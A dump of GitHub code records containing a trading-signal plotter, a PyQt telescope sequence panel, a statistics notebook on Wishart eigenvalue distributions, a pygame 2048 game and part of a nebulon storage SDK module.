0}\n return None\n\n\ndef plot_data(candle_data, buy_signals=None, sell_signals=None, indicators=None):\n \"\"\"\n The plot_data function takes a dataframe of candle data and plots the data and indicators.\n :param candle_data: pd.DataFrame: The dataframe of candle data\n :param buy_signals: pd.DataFrame or None: DataFrame containing buy signals, or None if no buy signals\n :param sell_signals: pd.DataFrame or None: DataFrame containing sell signals, or None if no sell signals\n :param indicators: List[str]: List of indicators or data columns to plot\n :return: None\n \"\"\"\n if indicators is None:\n indicators = [\"close\", \"ema\", \"fib_59\", \"fib_163\"]\n\n fig = go.Figure(data=[go.Candlestick(x=candle_data.index,\n open=candle_data['open'],\n high=candle_data['high'],\n low=candle_data['low'],\n close=candle_data['close'],\n )])\n\n # Plot buy signals\n if buy_signals is not None and len(buy_signals) > 0:\n prev_buy_signal_index = None\n for index, row in buy_signals.iterrows():\n if prev_buy_signal_index is None or index - prev_buy_signal_index > 1:\n buy_marker = go.Scatter(x=[index], y=[row['close']],\n mode='markers', name='Buy Signal', marker_symbol='triangle-up',\n marker=dict(color='green', size=15),\n text=\"Buy Signal\", textposition=\"bottom center\")\n fig.add_trace(buy_marker)\n prev_buy_signal_index = index\n elif prev_buy_signal_index is not None and index - prev_buy_signal_index == 1:\n prev_buy_signal_index = index\n\n # Plot sell signals\n if sell_signals is not None and len(sell_signals) > 0:\n prev_sell_signal_index = None\n for index, row in sell_signals.iterrows():\n if prev_sell_signal_index is None or index - prev_sell_signal_index > 1:\n sell_marker = go.Scatter(x=[index], y=[row['close']],\n mode='markers', name='Sell Signal', marker_symbol='triangle-down',\n marker=dict(color='red', size=15),\n text=\"Sell Signal\", textposition=\"top center\")\n fig.add_trace(sell_marker)\n prev_sell_signal_index = index\n elif prev_sell_signal_index is not None and index - prev_sell_signal_index == 1:\n prev_sell_signal_index = index\n\n for indicator in indicators:\n fig.add_trace(go.Scatter(x=candle_data.index, y=candle_data[indicator], name=indicator))\n\n fig.update_layout(title=\"Candle Data with Buy/Sell Signals\", xaxis_title=\"Date\", yaxis_title=\"Value\")\n fig.show()\n\n\n","repo_name":"JRBusiness/wiggy_conversion","sub_path":"app/strategy/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37859514007","text":"__author__ = 'alefur'\n\nfrom functools import partial\n\nimport numpy as np\nfrom PyQt5.QtWidgets import QCheckBox\nfrom sequencePanel.widgets import IconButton, EyeButton\n\n\nclass SubCommand(object):\n def __init__(self, subId, cmdStr, didFail, returnStr):\n self.id = subId\n self.cmdStr = cmdStr\n self.anomalies = ''\n self.returnStr = returnStr\n\n self.visit = self.decode(returnStr)\n self.setStatus(int(didFail))\n\n @property\n def isActive(self):\n return self.status == 'active'\n\n @property\n def isValid(self):\n return self.status == 'valid'\n\n @property\n def visitStart(self):\n return self.visit\n\n @property\n def visitEnd(self):\n return self.visit\n\n def setActive(self):\n self.status = 'active'\n\n def setStatus(self, didFail):\n if didFail == -1:\n self.status = 'valid'\n elif didFail == 0:\n self.status = 'finished'\n elif didFail == 1:\n self.status = 'failed'\n elif didFail == 2:\n self.status = 
'cancelled'\n else:\n raise ValueError(f'unknown status: {didFail}')\n\n def decode(self, returnStr):\n try:\n __, keys = returnStr.split('fileids=')\n visit, __, mask = keys.split(',')\n except ValueError:\n return -1\n\n return int(visit)\n\n\nclass CmdRow(object):\n color = {\"init\": (\"#FF7D7D\", \"#000000\"), \"valid\": (\"#7DFF7D\", \"#000000\"), \"active\": (\"#4A90D9\", \"#FFFFFF\"),\n \"finished\": (\"#5f9d63\", \"#FFFFFF\"), \"failed\": (\"#9d5f5f\", \"#FFFFFF\")}\n\n def __init__(self, panelwidget, name, comments, cmdStr, seqtype=''):\n self.status = 'init'\n self.id = -1\n self.panelwidget = panelwidget\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.cmds = dict()\n self.returnStr = ''\n\n self.valid = QCheckBox()\n self.valid.stateChanged.connect(self.setValid)\n self.colorCheckbox()\n\n self.buttonMoveUp = IconButton(iconFile='arrow_up2.png')\n self.buttonMoveUp.clicked.connect(self.moveUp)\n\n self.buttonMoveDown = IconButton(iconFile='arrow_down2.png')\n self.buttonMoveDown.clicked.connect(self.moveDown)\n\n self.buttonDelete = IconButton(iconFile='delete.png')\n self.buttonDelete.clicked.connect(self.remove)\n\n self.buttonEye = EyeButton()\n self.buttonEye.clicked.connect(partial(self.showSubcommands))\n\n @property\n def fullCmd(self):\n name = f'name=\"{self.name}\"' if self.name else ''\n comments = f'comments=\"{self.comments}\"' if self.comments else ''\n return f'{self.cmdStr} {name} {comments}'.strip()\n\n @property\n def info(self):\n return dict(name=self.name, comments=self.comments, cmdStr=self.cmdStr)\n\n @property\n def subcommands(self):\n return [self.cmds[k] for k in sorted(self.cmds.keys())]\n\n @property\n def isValid(self):\n return self.status == 'valid'\n\n @property\n def isActive(self):\n return self.status == 'active'\n\n @property\n def showSub(self):\n return self.buttonEye.state\n\n @property\n def nbRows(self):\n nbRows = len(self.subcommands) if (self.showSub and self.subcommands) else 2\n nbRows = 2 if nbRows < 2 else nbRows\n return nbRows\n\n @property\n def height(self):\n isActive = [subcommand.isActive for subcommand in self.subcommands]\n height = (np.argmax(isActive) + 0.5) if (self.showSub and isActive) else 1\n return height\n\n @property\n def visits(self):\n return [subcommand.visit for subcommand in self.subcommands if subcommand.visit != -1]\n\n @property\n def visitStart(self):\n if not self.visits:\n return -1\n return min(self.visits)\n\n @property\n def visitEnd(self):\n if not self.visits:\n return -1\n return max(self.visits)\n\n @property\n def registered(self):\n return self.status in ['finished', 'failed'] and self.visits\n\n def colorCheckbox(self):\n self.valid.setStyleSheet(\"QCheckBox {background-color:%s};\" % CmdRow.color[self.status][0])\n\n def setStatus(self, status):\n self.status = status\n self.colorCheckbox()\n\n self.panelwidget.updateTable()\n\n def setActive(self):\n self.setStatus(status='active')\n self.valid.setEnabled(False)\n\n self.panelwidget.sendCommand(fullCmd=self.fullCmd,\n timeLim=7 * 24 * 3600,\n callFunc=self.handleResult)\n\n def setFinished(self):\n self.valid.setEnabled(False)\n self.setStatus(status='finished')\n\n def setFailed(self):\n self.valid.setEnabled(False)\n self.setStatus(status='failed')\n\n def setValid(self, state):\n status = \"valid\" if state == 2 else \"init\"\n self.setStatus(status=status)\n\n def showSubcommands(self, *args, bool=None):\n state = not self.buttonEye.state if bool is None else bool\n\n 
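        # Apply the computed toggle state to the eye button, then redraw the
        # panel table so sub-command rows are expanded or collapsed accordingly.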
self.buttonEye.setState(state=state)\n self.panelwidget.updateTable()\n\n def handleResult(self, resp):\n reply = resp.replyList[-1]\n returnStr = reply.keywords.canonical(delimiter=';')\n code = resp.lastCode\n\n if code in [':', 'F']:\n self.terminate(code=code, returnStr=returnStr)\n else:\n self.updateInfo(reply=reply)\n\n self.panelwidget.logLayout.logArea.printResponse(resp=resp)\n\n def updateInfo(self, reply):\n\n if 'sps_sequence' in reply.keywords:\n self.setSPSSequence(*reply.keywords['sps_sequence'].values)\n\n elif 'sequence' in reply.keywords:\n self.setSequence(*reply.keywords['sequence'].values)\n\n elif 'experiment' in reply.keywords:\n self.setExperiment(*reply.keywords['experiment'].values)\n\n elif 'subCommand' in reply.keywords:\n self.updateSubCommand(*reply.keywords['subCommand'].values)\n\n def terminate(self, code, returnStr):\n self.returnStr = returnStr\n self.setFinished() if code == ':' else self.setFailed()\n\n self.panelwidget.scheduler.nextSVP()\n\n def setSPSSequence(self, sequenceId, seqtype, cmdStr, name, comments, status, *args):\n\n self.id = int(sequenceId)\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.buttonEye.setEnabled(True)\n\n self.panelwidget.updateTable()\n\n def setSequence(self, sequenceId, groupId, seqtype, name, comments, cmdStr, status, output, *args):\n\n self.id = int(sequenceId)\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.buttonEye.setEnabled(True)\n\n self.panelwidget.updateTable()\n\n def setExperiment(self, dbname, experimentId, seqtype, cmdStr, name, comments):\n\n self.dbname = dbname\n self.id = int(experimentId)\n self.seqtype = seqtype\n self.name = name\n self.comments = comments\n self.cmdStr = cmdStr\n self.buttonEye.setEnabled(True)\n\n self.panelwidget.updateTable()\n\n def updateSubCommand(self, expId, subId, *args):\n subId = int(subId)\n self.cmds[subId] = SubCommand(subId, *args)\n\n actives = [subcommand for subcommand in self.subcommands if subcommand.isActive]\n valids = [subcommand for subcommand in self.subcommands if subcommand.isValid]\n\n if actives:\n return\n\n if valids:\n valids[0].setActive()\n\n self.panelwidget.updateTable()\n\n def moveUp(self):\n cmdRows = self.panelwidget.cmdRows\n\n new_ind = cmdRows.index(self) - 1\n new_ind = 0 if new_ind < 0 else new_ind\n cmdRows.remove(self)\n cmdRows.insert(new_ind, self)\n\n self.panelwidget.updateTable()\n\n def moveDown(self):\n cmdRows = self.panelwidget.cmdRows\n\n new_ind = cmdRows.index(self) + 1\n new_ind = len(cmdRows) - 1 if new_ind > len(cmdRows) - 1 else new_ind\n cmdRows.remove(self)\n cmdRows.insert(new_ind, self)\n\n self.panelwidget.updateTable()\n\n def remove(self):\n if not self.isActive:\n cmdRows = self.panelwidget.cmdRows\n cmdRows.remove(self)\n\n self.panelwidget.updateTable()\n","repo_name":"Subaru-PFS/ics_sequencePanel","sub_path":"python/sequencePanel/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":8424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24659350332","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# **Centro de investigación en Matemáticas A.C**\n# \n# **Temas Selectos en Estadística**\n# \n# **Hairo Ulises Miranda Belmonte**\n# \n# **Tarea 2. 
Wishart and Marcenko-Pastur Distributions**\n# \n# **August 23, 2019**\n\n# # Wishart and Marcenko-Pastur Distributions\n\n# ## Exercise 1 \n# \n# * What do the eigenvalues of a Gaussian covariance matrix look like?\n# \n# Run the following experiment (Izenman, 2nd edition):\n# \n# * Generate a matrix Z of dimension $p × n$ whose entries are iid $N(0, 1)$\n# \n# * Let D be a diagonal $p × p$ matrix, and $X = DZ$\n# \n# * Let S = $n^{−1}XX'$ be the sample covariance matrix of dimension $p × p$. In this way $XX' ∼ Wp(n, D2)$\n# \n# * Simulate and plot the eigenvalues of the matrix S in descending order\n# for the cases $p = 30$, $n ∈ {30, 300}$, and $D^2 = diag(12, 11, 10, 9, 8, 7, 3, 3, 3, . . . , 3)$\n# \n# * How many principal components would you retain in each case?\n\n# Simulation \n\n# In[374]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\n\np = 30\nn = [30, 300]\nMatriz = []\nfor i in n :\n    Z = np.random.normal(0, 1, (p,i))\n    a1 = np.array([12,11,10,9,8,7])\n    a2 = np.repeat(3, p-6)\n    D2 = np.diag(np.concatenate((a1,a2)))\n    D = np.sqrt(np.diag(np.concatenate((a1,a2))))\n    X = np.dot(D,Z)\n    S = np.dot(X, X.T)/ i\n    v, w = np.linalg.eigh(S)\n    temp = np.sort(v)[::-1]\n    Matriz.append(temp)\n\n\n# Visualization\n\n# From the simulated Gaussian matrices, the covariance matrix of each one is estimated and its eigenvalues and eigenvectors are computed.\n# \n# The eigenvalues are sorted in descending order and their respective *screeplots* are drawn (i.e., for $n=30, 300$)\n\n# In[375]:\n\n\nplt.subplot(1, 2, 1)\nplt.plot(Matriz[0], 'o', c=\"black\")\nplt.plot(Matriz[0], '-', c=\"black\")\nplt.title('Screeplot n = [30, 300]')\nplt.ylabel('Eigenvalues')\n\nplt.subplot(1, 2, 2)\nplt.plot(Matriz[1], 'o', c=\"black\")\nplt.plot(Matriz[1], '-', c=\"black\")\nplt.ylim((0,20))\nplt.xlabel('# Eigenvalues')\n\n\nplt.show()\n\n\n# The plot on the left shows the eigenvalues for $n=30$, the one on the right for $n=300$. Following the \"elbow\" criterion, we can keep between 8 and 10 components.\n\n# In[376]:\n\n\nimport pandas as pd\n\nvar_exp = [Matriz[0][:i+1].sum()/(Matriz[0].sum()) for i in range(10)]\nvalor_prop = list(range(10))\n\npd.DataFrame({'Explained variance': var_exp}, \n             index = ['1','2','3','4','5','6','7','8','9','10'])\n\n\n# Taking the number of components needed to explain $80\\%$ of the variance, we conclude that 10 are enough.\n\n# ## Exercise 2\n# \n# * Distribution of the eigenvalues of the random matrix $XX'\\sim W_p(n, I_p)$\n# \n# * Plot the eigenvalue distribution by Monte Carlo, considering the case $n>p$\n\n# Simulation\n\n# In[377]:\n\n\nfinal = []\np = 30\nn = [30, 300]\n\nfor j in n:\n    valores_p = []\n    for i in range(1000):\n        X = np.random.normal(0, 1, (p,j))\n        temp2 = np.dot(X,X.T)/ j\n        v, w = np.linalg.eigh(temp2)\n        valores_p.append(v.tolist())\n    flattened = [val for sublist in valores_p for val in sublist]\n    final.append(flattened)\n\n\n# Visualization\n\n# One thousand simulations of a random matrix with iid normal entries of mean $\\mu = 0$ and variance $\\sigma^2 = 1$ are run. The covariance matrix of each one is estimated and its eigenvalues are computed. Once all the eigenvalues from all the simulations are collected, a histogram is plotted to approximate the density of the eigenvalues of a Wishart-distributed random matrix.\n# \n# This is done for several matrix sizes, first for $n=30$ and then for $n =300$\n\n# Density to be simulated with Monte Carlo\n\n# $$\\rho(\\lambda_1,...,\\lambda_p)=\\frac{1}{Z_p}e^{-\\frac{\\Sigma_{i=1}^{p}\\lambda_i}{2}}\\Pi_{i=1}^{p}\\lambda_i^{\\alpha/2}\\Pi_{j<i}|\\lambda_i-\\lambda_j|$$\n\nprint(\"Mean of the diagonal elements with n =10 ->\", np.diag(C[0]).mean())\nprint(\"Sd of the diagonal elements with n =10 ->\", np.sqrt(np.diag(C[0]).var()))\n\nprint(\"\\nMean of the diagonal elements with n =1000 ->\", np.diag(C[1]).mean())\nprint(\"Sd of the diagonal elements with n =1000:\", np.sqrt(np.diag(C[1]).var()))\n\n\n# The mean value keeps fluctuating around one as \"n\" increases, while the variance tends to shrink in proportion to one over \"n\"\n\n# * Mean and standard deviation of the off-diagonal elements\n\n# In[387]:\n\n\nindex = ~np.eye(C[0].shape[0],dtype=bool)\n\nprint(\"Mean of the off-diagonal elements with n =10 ->\",C[0][index].mean())\nprint(\"Sd of the off-diagonal elements with n =10 ->\", np.sqrt(C[0][index].var()))\n\nprint(\"\\nMean of the off-diagonal elements with n =1000 ->\", C[1][index].mean())\nprint(\"Sd of the off-diagonal elements with n =1000:\", np.sqrt(C[1][index].var()))\n\n\n# For the off-diagonal elements the mean tends to increase as \"n\" grows, and the standard deviation shrinks by the same factor as the diagonal elements\n","repo_name":"hairo1421/Maestria-Computo-Estadistico","sub_path":"05 - Tercer Semestre Temas en Estadística/Matrices Aleatorias/Tarea 2 Distribución de Wishart y Marcenko-Pastur.py","file_name":"Tarea 2 Distribución de Wishart y Marcenko-Pastur.py","file_ext":"py","file_size_in_byte":10647,"program_lang":"python","lang":"es","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"}
+{"seq_id":"29137153993","text":"import numpy as np\nimport pygame\n\nDisplay = pygame.display.set_mode([201, 201])\n\nBoard = np.zeros((4, 4), dtype=int)\nPreviousBoard = np.zeros((4, 4), dtype=int)\n\ndef NewRandom(Num):\n    global Board\n    for _ in range(Num):\n        if 0 in Board:\n            Random = np.random.randint(0, 4, 2)\n            while Board[Random[0], Random[1]] != 0:\n                Random = np.random.randint(0, 4, 2)\n            Board[Random[0], Random[1]] = np.random.choice([2, 4], p=[0.9, 0.1])\n\nNewRandom(2)\n\npygame.init()\npygame.display.set_caption('2048')\n\ndone = False\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\nwhile not np.array_equal(PreviousBoard, Board):\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            PreviousBoard = Board\n\n        # Display\n        Display.fill(BLACK)\n\n        for i in range(3):\n            pygame.draw.line(Display, WHITE, (i * 50 + 50, 0), (i * 50 + 50, 201))\n            pygame.draw.line(Display, WHITE, (0, i * 50 + 50), (201, i * 50 + 50))\n\n        for i in range(4):\n            for j in range(4):\n                if Board[j, i] != 0:\n                    Display.blit(pygame.font.SysFont(\"Raleway\", 24).render(str(Board[j, i]), 1, WHITE), (i * 50 + (4 - len(str(Board[j, i]))) * 5 + 6, j * 50 + 20))\n        \n        # User Input\n        if event.type == pygame.KEYDOWN:\n            if (event.key == pygame.K_UP):\n                PreviousBoard = Board.copy()\n                for _ in range(3):\n                    for i in reversed(range(3)):\n                        for j in range(4):\n                            if Board[i, j] == Board[i + 1, j]:\n                                Board[i, j] *= 2\n                                Board[i + 1, j] = 0\n                            if Board[i, j] == 0:\n                                Board[i, j] = Board[i + 1, 
j] = 0\n                            NewRandom(1)\n\n                    if (event.key == pygame.K_RIGHT):\n                        PreviousBoard = Board.copy()\n                        for _ in range(3):\n                            for i in range(4):\n                                for j in range(1, 4):\n                                    if Board[i, j] == Board[i, j - 1]:\n                                        Board[i, j] *= 2\n                                        Board[i, j - 1] = 0\n                                    if Board[i, j] == 0:\n                                        Board[i, j] = Board[i, j - 1]\n                                        Board[i, j - 1] = 0\n                        NewRandom(1)\n\n                    if (event.key == pygame.K_DOWN):\n                        PreviousBoard = Board.copy()\n                        for _ in range(3):\n                            for i in range(1, 4):\n                                for j in range(4):\n                                    if Board[i, j] == Board[i - 1, j]:\n                                        Board[i, j] *= 2\n                                        Board[i - 1, j] = 0\n                                    if Board[i, j] == 0:\n                                        Board[i, j] = Board[i - 1, j]\n                                        Board[i - 1, j] = 0\n                        NewRandom(1)\n\n                    if (event.key == pygame.K_LEFT):\n                        PreviousBoard = Board.copy()\n                        for _ in range(3):\n                            for i in range(4):\n                                for j in reversed(range(3)):\n                                    if Board[i, j] == Board[i, j + 1]:\n                                        Board[i, j] *= 2\n                                        Board[i, j + 1] = 0\n                                    if Board[i, j] == 0:\n                                        Board[i, j] = Board[i, j + 1]\n                                        Board[i, j + 1] = 0\n                        NewRandom(1)\n\n            pygame.display.flip()\n\npygame.quit()","repo_name":"seanmabli/2048","sub_path":"human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"73726795450","text":"from typing import List\nfrom .graphqlclient import GraphQLParam, NebMixin\nfrom datetime import datetime\nfrom .common import NebEnum, PageInput, read_value\nfrom .filters import StringFilter, UUIDFilter\nfrom .sorting import SortDirection\nfrom .tokens import TokenResponse\nfrom .issues import Issues\nfrom .updates import UpdateHistory, NPodRecommendedPackage\n\n__all__ = [\n    \"BondType\",\n    \"BondTransmitHashPolicy\",\n    \"BondLACPTransmitRate\",\n    \"SetNPodTimeZoneInput\",\n    \"NPodSort\",\n    \"NPodFilter\",\n    \"IPInfoConfigInput\",\n    \"NPodSpuInput\",\n    \"CreateNPodInput\",\n    \"NPod\",\n    \"NPodList\",\n    \"NPodCustomDiagnostic\",\n    \"ExpectedNPodCapacity\",\n    \"UpdateNPodMembersInput\",\n    \"UpdateImmutableBootInput\",\n    \"NPodsMixin\"\n]\n\n\n# TODO: Move these enums to the SPU space\nclass BondTransmitHashPolicy(NebEnum):\n    \"\"\"Transmit hash policy used by link aggregation\n\n    Allows selecting the algorithm for child interface selection according to\n    the specified TCP/IP Layer.\n    \"\"\"\n\n    TransmitHashPolicyLayer2 = \"TransmitHashPolicyLayer2\"\n    \"\"\"\n    Uses the physical interface MAC address for interface selection\n    \"\"\"\n\n    TransmitHashPolicyLayer34 = \"TransmitHashPolicyLayer34\"\n    \"\"\"\n    Uses the layer 3 and 4 protocol data for interface selection\n    \"\"\"\n\n    TransmitHashPolicyLayer23 = \"TransmitHashPolicyLayer23\"\n    \"\"\"\n    Uses the layer 2 and 3 protocol data for interface selection\n    \"\"\"\n\n\nclass BondLACPTransmitRate(NebEnum):\n    \"\"\"Link aggregation transmit rate for LACP\n\n    Allows configuration of the LACP rate - how frequently the LACP partner\n    should transmit LACPDUs (Link Aggregation Control Protocol Data Units).\n    \"\"\"\n\n    LACPTransmitRateSlow = \"LACPTransmitRateSlow\"\n    \"\"\"\n    Send LACPDUs every thirty seconds\n    \"\"\"\n\n    LACPTransmitRateFast = \"LACPTransmitRateFast\"\n    \"\"\"\n    Send LACPDUs every one second\n    \"\"\"\n\n\nclass BondType(NebEnum):\n    \"\"\"Link aggregation type for data ports\n\n    Allows selecting the link aggregation mode for data network interfaces.\n    \"\"\"\n\n    BondModeNone = \"BondModeNone\"\n    \"\"\"\n    No link aggregation. Both data ports communicate independently on their\n    own networks. 
NebOS will internally manage failover between the interfaces.\n \"\"\"\n\n BondMode8023ad = \"BondMode8023ad\"\n \"\"\"\n Use LACP (IEEE 802.3ad) for link aggregation.\n \"\"\"\n\n\nclass DebugInfoInput:\n \"\"\"Allows collecting debug information of infrastructure on demand\n\n This input class is used in the collect_debug_info method that will collect\n verbose debug and troubleshooting information from the specified resource.\n This information is used during support case troubleshooting.\n \"\"\"\n\n def __init__(\n self,\n npod_uuid: str = None,\n spu_serial: str = None,\n note: str = None,\n support_case_number: str = None\n ):\n \"\"\"Constructs a new input object to collect debug information\n\n This input class is used in the collect_debug_info method that will\n collect verbose debug and troubleshooting information from the\n specified resource. This information is used during support case\n troubleshooting.\n\n One of ``npod_uuid`` or ``spu_serial`` must be specified as the target\n of information collection. If a nPod UUID is specified, information is\n collected from all SPUs in the nPod. If a SPU serial number is used,\n only information of the SPU is collected.\n\n Users can add additional information to the debug information through\n the use of the ``note`` parameter. As an example, users can add\n additional comments about observed behavior in this field.\n\n If the collection of debug information is done as part of an active\n support case, users are encouraged to populate the\n ``support_case_number`` parameter to associate the submitted information\n directly with the support case.\n\n :param npod_uuid: The unique identifier of the nPod from which to\n collect debug and troubleshooting information\n :type npod_uuid: str, optional\n :param spu_serial: The serial number of a services processing unit from\n which to collect debug and troubleshooting information\n :type spu_serial: str, optional\n :param note: An optional note for the submitted data that will be made\n accessible to nebulon customer satisfaction and engineering that is\n reviewing the debug and troubleshooting information\n :type note: str, optional\n :param support_case_number: An optional support case number. 
If the\n information collection is related to an active support case, users\n are encouraged to supply the associated support case number.\n :type support_case_number: str, optional\n \"\"\"\n\n self.__npod_uuid = npod_uuid\n self.__spu_serial = spu_serial\n self.__note = note\n self.__support_case_number = support_case_number\n\n @property\n def npod_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod from which to collect data\"\"\"\n return self.__npod_uuid\n\n @property\n def spu_serial(self) -> str:\n \"\"\"The serial number the SPU from which to collect data\"\"\"\n return self.__spu_serial\n\n @property\n def note(self) -> str:\n \"\"\"An optional note to submit with the debug information\"\"\"\n return self.__note\n\n @property\n def support_case_number(self) -> str:\n \"\"\"An optional support case number related to this data collection\"\"\"\n return self.__support_case_number\n\n @property\n def as_dict(self) -> dict:\n result = {\n \"nPodUUID\": self.npod_uuid,\n \"spuSerial\": self.spu_serial,\n \"note\": self.note,\n \"supportCaseNumber\": self.support_case_number\n }\n return result\n\n\nclass SetNPodTimeZoneInput:\n \"\"\"Allows setting the timezone of an nPod or SPU\n\n Possible timezones include:\n\n * ``Africa/Abidjan``\n * ``Africa/Accra``\n * ``Africa/Addis_Ababa``\n * ``Africa/Algiers``\n * ``Africa/Asmara``\n * ``Africa/Asmera``\n * ``Africa/Bamako``\n * ``Africa/Bangui``\n * ``Africa/Banjul``\n * ``Africa/Bissau``\n * ``Africa/Blantyre``\n * ``Africa/Brazzaville``\n * ``Africa/Bujumbura``\n * ``Africa/Cairo``\n * ``Africa/Casablanca``\n * ``Africa/Ceuta``\n * ``Africa/Conakry``\n * ``Africa/Dakar``\n * ``Africa/Dar_es_Salaam``\n * ``Africa/Djibouti``\n * ``Africa/Douala``\n * ``Africa/El_Aaiun``\n * ``Africa/Freetown``\n * ``Africa/Gaborone``\n * ``Africa/Harare``\n * ``Africa/Johannesburg``\n * ``Africa/Juba``\n * ``Africa/Kampala``\n * ``Africa/Khartoum``\n * ``Africa/Kigali``\n * ``Africa/Kinshasa``\n * ``Africa/Lagos``\n * ``Africa/Libreville``\n * ``Africa/Lome``\n * ``Africa/Luanda``\n * ``Africa/Lubumbashi``\n * ``Africa/Lusaka``\n * ``Africa/Malabo``\n * ``Africa/Maputo``\n * ``Africa/Maseru``\n * ``Africa/Mbabane``\n * ``Africa/Mogadishu``\n * ``Africa/Monrovia``\n * ``Africa/Nairobi``\n * ``Africa/Ndjamena``\n * ``Africa/Niamey``\n * ``Africa/Nouakchott``\n * ``Africa/Ouagadougou``\n * ``Africa/Porto-Novo``\n * ``Africa/Sao_Tome``\n * ``Africa/Timbuktu``\n * ``Africa/Tripoli``\n * ``Africa/Tunis``\n * ``Africa/Windhoek``\n * ``America/Adak``\n * ``America/Anchorage``\n * ``America/Anguilla``\n * ``America/Antigua``\n * ``America/Araguaina``\n * ``America/Argentina/Buenos_Aires``\n * ``America/Argentina/Catamarca``\n * ``America/Argentina/ComodRivadavia``\n * ``America/Argentina/Cordoba``\n * ``America/Argentina/Jujuy``\n * ``America/Argentina/La_Rioja``\n * ``America/Argentina/Mendoza``\n * ``America/Argentina/Rio_Gallegos``\n * ``America/Argentina/Salta``\n * ``America/Argentina/San_Juan``\n * ``America/Argentina/San_Luis``\n * ``America/Argentina/Tucuman``\n * ``America/Argentina/Ushuaia``\n * ``America/Aruba``\n * ``America/Asuncion``\n * ``America/Atikokan``\n * ``America/Atka``\n * ``America/Bahia``\n * ``America/Bahia_Banderas``\n * ``America/Barbados``\n * ``America/Belem``\n * ``America/Belize``\n * ``America/Blanc-Sablon``\n * ``America/Boa_Vista``\n * ``America/Bogota``\n * ``America/Boise``\n * ``America/Buenos_Aires``\n * ``America/Cambridge_Bay``\n * ``America/Campo_Grande``\n * ``America/Cancun``\n * ``America/Caracas``\n * 
``America/Catamarca``\n * ``America/Cayenne``\n * ``America/Cayman``\n * ``America/Chicago``\n * ``America/Chihuahua``\n * ``America/Coral_Harbour``\n * ``America/Cordoba``\n * ``America/Costa_Rica``\n * ``America/Creston``\n * ``America/Cuiaba``\n * ``America/Curacao``\n * ``America/Danmarkshavn``\n * ``America/Dawson``\n * ``America/Dawson_Creek``\n * ``America/Denver``\n * ``America/Detroit``\n * ``America/Dominica``\n * ``America/Edmonton``\n * ``America/Eirunepe``\n * ``America/El_Salvador``\n * ``America/Ensenada``\n * ``America/Fort_Nelson``\n * ``America/Fort_Wayne``\n * ``America/Fortaleza``\n * ``America/Glace_Bay``\n * ``America/Godthab``\n * ``America/Goose_Bay``\n * ``America/Grand_Turk``\n * ``America/Grenada``\n * ``America/Guadeloupe``\n * ``America/Guatemala``\n * ``America/Guayaquil``\n * ``America/Guyana``\n * ``America/Halifax``\n * ``America/Havana``\n * ``America/Hermosillo``\n * ``America/Indiana/Indianapolis``\n * ``America/Indiana/Knox``\n * ``America/Indiana/Marengo``\n * ``America/Indiana/Petersburg``\n * ``America/Indiana/Tell_City``\n * ``America/Indiana/Vevay``\n * ``America/Indiana/Vincennes``\n * ``America/Indiana/Winamac``\n * ``America/Indianapolis``\n * ``America/Inuvik``\n * ``America/Iqaluit``\n * ``America/Jamaica``\n * ``America/Jujuy``\n * ``America/Juneau``\n * ``America/Kentucky/Louisville``\n * ``America/Kentucky/Monticello``\n * ``America/Knox_IN``\n * ``America/Kralendijk``\n * ``America/La_Paz``\n * ``America/Lima``\n * ``America/Los_Angeles``\n * ``America/Louisville``\n * ``America/Lower_Princes``\n * ``America/Maceio``\n * ``America/Managua``\n * ``America/Manaus``\n * ``America/Marigot``\n * ``America/Martinique``\n * ``America/Matamoros``\n * ``America/Mazatlan``\n * ``America/Mendoza``\n * ``America/Menominee``\n * ``America/Merida``\n * ``America/Metlakatla``\n * ``America/Mexico_City``\n * ``America/Miquelon``\n * ``America/Moncton``\n * ``America/Monterrey``\n * ``America/Montevideo``\n * ``America/Montreal``\n * ``America/Montserrat``\n * ``America/Nassau``\n * ``America/New_York``\n * ``America/Nipigon``\n * ``America/Nome``\n * ``America/Noronha``\n * ``America/North_Dakota/Beulah``\n * ``America/North_Dakota/Center``\n * ``America/North_Dakota/New_Salem``\n * ``America/Nuuk``\n * ``America/Ojinaga``\n * ``America/Panama``\n * ``America/Pangnirtung``\n * ``America/Paramaribo``\n * ``America/Phoenix``\n * ``America/Port-au-Prince``\n * ``America/Port_of_Spain``\n * ``America/Porto_Acre``\n * ``America/Porto_Velho``\n * ``America/Puerto_Rico``\n * ``America/Punta_Arenas``\n * ``America/Rainy_River``\n * ``America/Rankin_Inlet``\n * ``America/Recife``\n * ``America/Regina``\n * ``America/Resolute``\n * ``America/Rio_Branco``\n * ``America/Rosario``\n * ``America/Santa_Isabel``\n * ``America/Santarem``\n * ``America/Santiago``\n * ``America/Santo_Domingo``\n * ``America/Sao_Paulo``\n * ``America/Scoresbysund``\n * ``America/Shiprock``\n * ``America/Sitka``\n * ``America/St_Barthelemy``\n * ``America/St_Johns``\n * ``America/St_Kitts``\n * ``America/St_Lucia``\n * ``America/St_Thomas``\n * ``America/St_Vincent``\n * ``America/Swift_Current``\n * ``America/Tegucigalpa``\n * ``America/Thule``\n * ``America/Thunder_Bay``\n * ``America/Tijuana``\n * ``America/Toronto``\n * ``America/Tortola``\n * ``America/Vancouver``\n * ``America/Virgin``\n * ``America/Whitehorse``\n * ``America/Winnipeg``\n * ``America/Yakutat``\n * ``America/Yellowknife``\n * ``Antarctica/Casey``\n * ``Antarctica/Davis``\n * ``Antarctica/DumontDUrville``\n * 
